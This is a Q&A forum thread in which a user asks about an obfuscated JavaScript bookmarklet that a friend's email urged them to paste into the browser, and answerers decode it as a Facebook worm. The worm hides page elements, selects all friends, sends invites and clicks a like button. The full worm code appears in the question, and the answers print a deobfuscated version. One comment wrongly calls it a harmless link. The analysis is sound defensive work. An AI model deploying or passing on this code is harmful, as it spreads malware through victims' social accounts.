# What does this code do

Tags: javascript

Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ...

```
javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();
```

Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ...

PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.

But ... Could someone tell me what it does?

Comment: Just a variant of this worm: http://davezor.posterous.com/reverse-engineering-the-newest-facebook-invit

Answer (score 13, accepted):

I haven't decoded completely the code, but here's a couple of hints to it.

The variable `_0xc100` defines an array of strings. The character are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \x76 equals "v".

You can safely `alert(_0xc100);` to see it in plain text.

```
var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79", 
      "\x73\x74\x79\x6C\x65", 
      "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
      "\x68\x69\x64\x64\x65\x6E",
      "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
      "\x76\x61\x6C\x75\x65",
      "\x63\x6C\x69\x63\x6B",
      "\x73\x75\x67\x67\x65\x73\x74",
      "\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
      "\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
      "\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
      "\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
      "\x6C\x69\x6B\x65\x6D\x65"];
```

translates to an array containing these keywords

```
visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme
```

Now, the following statements (**DON'T EXECUTE THOSE**) use these keywords to actually execute functions.

For instance:

```
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
```

is equivalent to (`d` is defined as `document` and `mw` is defined at the top)

```
document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";
```

which hides an element called `app125879300771588_mwrapper`

the following instructions give

```
document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;
```

which copies the content of `app125879300771588_jop` into `app125879300771588_jode`

and

```
document.getElementById("suggest").click();
```

which I guess clicks some "suggest" button.

Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)

They translate to

```
setTimeout(function () {
    select_all();
     }, 5000);
```

Which I assume selects all your friends...

```
setTimeout(function () 
    {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
    }, 5000);
```

... send them invites

```
setTimeout(function () 
    {
    document.getElementById("likeme").click();
    document.getElementById("app125879300771588_ifo").innerHTML =
       document.getElementById("app125879300771588_ifc").value;
    }, 5000);
```

... and presses a like button

Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.

Answer (score 12):

```
a = 'app125879300771588_jop';
b = 'app125879300771588_jode';
ifc = 'app125879300771588_ifc';
ifo = 'app125879300771588_ifo';
mw = 'app125879300771588_mwrapper';
var _0xc100 = ["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "click", "suggest", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog", "likeme"];
d = document;
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
d[_0xc100[2]](a)[_0xc100[4]] = d[_0xc100[2]](b)[_0xc100[5]];
d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();
setTimeout(function () {
    fs[_0xc100[8]]();
}, 5000);
setTimeout(function () {
    SocialGraphManager[_0xc100[11]](_0xc100[9], _0xc100[10]);
}, 5000);
setTimeout(function () {
    d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();
    d[_0xc100[2]](ifo)[_0xc100[4]] = d[_0xc100[2]](ifc)[_0xc100[5]];
}, 5000);
```

This is most likely an adaption of one of many Facebook worms that sends itself to all of your friends.

Looke [here](https://stackoverflow.com/questions/2833163/facebook-javascript/2833291#2833291) for a similar question.

Other versions of this used p.a.c.k.e.r to obfuscate, and these could easily be deobfuscated by running the p.a.c.k.e.r code through http://jsbeautifier.org/

Answer (score 4):

It's an [obfuscated](http://en.wikipedia.org/wiki/Obfuscated_code) [bookmarklet](http://en.wikipedia.org/wiki/Bookmarklet). You can unobfuscate it (carefully) to see the actual Javascript it will run. If you don't have a powerful need to, though, probably not worth bothering. I'd bin it and check with my friend to see if it really is coming from him/her, and if so, why.

Comment: I had a friend look this over (and run it on a machine we didn't care about)
Turns out it's simply a link to this :

http://www.hiwiller.com/2010/04/29/if-mario-was-designed-in-2010/

Comment: I'm familiar with obfustication ... what tools can i use to do this sort of thing ... would make for some interesting games / challenges.

Comment: *"I had a friend...run it on a machine we didn't care about...Turns out it's simply a link to..."* Really? 'Cause that reference to `SocialGraphManager` looks pretty suspicious to me. See: http://davezor.posterous.com/reverse-engineering-the-newest-facebook-invit

Comment: @Wardy: You can read some good tutorials (not only about JS) and challenge yourself here: http://www.bright-shadows.net/
It's a very good (and fun) excercise to understand code vulnerability, obfuscation, security etc.

Comment: Hello from the future. nico's link is dead, so here's [an archived copy](https://web.archive.org/web/20100520023535/davezor.posterous.com/reverse-engineering-the-newest-facebook-invit).